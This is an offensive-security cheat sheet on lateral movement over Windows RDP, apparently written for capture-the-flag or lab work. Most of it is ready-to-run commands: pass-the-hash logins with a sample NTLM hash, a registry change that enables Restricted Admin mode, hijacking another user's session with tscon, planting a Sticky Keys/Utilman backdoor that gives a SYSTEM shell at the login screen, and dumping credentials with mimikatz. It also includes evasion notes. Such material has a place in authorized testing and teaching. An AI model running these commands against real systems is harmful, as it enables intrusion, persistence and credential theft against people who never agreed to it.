RDP Lateral Movement
#Overview
Remote Desktop Protocol (RDP) on port 3389 provides graphical remote access for lateral movement. Beyond standard credential-based login, advanced techniques include Restricted Admin mode for Pass-the-Hash, session hijacking via TSCon, and accessibility feature backdoors planted at the login screen. RDP is valuable when command-line shells are insufficient (e.g., GUI-dependent applications or UAC bypass exploits requiring interactive desktop).
#Prerequisites
- Valid credentials or NTLM hash (for Restricted Admin mode)
- Port 3389 accessible
- xfreerdp (Linux) or mstsc.exe (Windows)
- SYSTEM privileges for session hijacking and backdoor techniques
#Exploitation / Execution
#1. Standard RDP Connection
xfreerdp /v:<IP> /u:<user> /p:'<password>'
xfreerdp /v:<IP> /u:<user> /p:'<password>' /dynamic-resolution
xfreerdp /v:<IP> /u:<user> /p:'<password>' /drive:share,/tmp # Mount local dir as share
#2. Restricted Admin Mode (PTH over RDP)
Allows authentication using NTLM hash instead of plaintext password. Must be enabled on target:
# Enable Restricted Admin on target (requires elevated access)
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f
# Connect with hash
xfreerdp /v:<IP> /u:<user> /pth:<NTLM_hash>
xfreerdp /v:<IP> /u:administrator /pth:d9485863c1e9e05851aa40cbb4ab9dff
#3. TSCon Session Hijacking
Hijack an existing active RDP session. Requires SYSTEM privileges:
query session # List active sessions (ID, User, State)
tscon <SESSION_ID> /dest:console # Connect your session to theirs
If you have RDP access as a different user, you can hijack the Administrator's session:
query session
# Output:
# SESSIONNAME USERNAME ID STATE
# >console Administrator 1 Active
# victim 3 Disc
tscon 3 /dest:console # Hijack victim's disconnected session
#4. Sticky Keys / Utilman Backdoor
Requires SYSTEM access. Replace accessibility binaries with cmd.exe to spawn SYSTEM shell at login screen:
# Sticky Keys (trigger: press Shift 5 times at RDP login screen)
takeown /f C:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Everyone:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe /y
# Utilman (trigger: click Ease of Access button at login screen)
takeown /f C:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Everyone:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe /y
After replacement, connect via RDP, trigger the backdoor at the login screen, and a SYSTEM cmd.exe appears.
#5. RDP Credential Theft (from SYSTEM context)
cmdkey /list # List saved credentials
mimikatz # sekurlsa::dpapi # Extract DPAPI keys
mimikatz # vault::cred /patch # Dump vault credentials
#Common Pitfalls
- ⚠️ Restricted Admin mode must be enabled on target; disabled by default on some builds
- ⚠️ NLA (Network Level Authentication) must be off for some backdoor techniques
- ⚠️ Session hijacking requires SYSTEM or the target session's user token
- ⚠️ Accessibility backdoors leave modified binaries that integrity checks can detect
#OPSEC Considerations
- 🛡️ RDP logons generate Event ID 4624 with Logon Type 10 (RemoteInteractive)
- 🛡️ Sticky keys/Utilman replacement creates file hash mismatch (detectable by file integrity monitoring)
- 🛡️ Session hijacking (tscon) generates minimal logs but may disconnect the legitimate user (alerting them)
- 🛡️ Multiple RDP connections from unexpected IPs may alert SOC
#Post-Exploitation Value
- Full GUI access enables credential harvesting through saved RDP connections
- Drive redirection facilitates data exfiltration without additional tools
- UAC bypass exploits requiring GUI interaction become feasible
- Session hijacking provides access to in-progress user work and unlocked applications
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| xfreerdp | https://github.com/FreeRDP/FreeRDP |
| mimikatz | https://github.com/gentilkiwi/mimikatz |
#Source Machines
- Jeeves (Medium, Windows) - RDP access after Jenkins foothold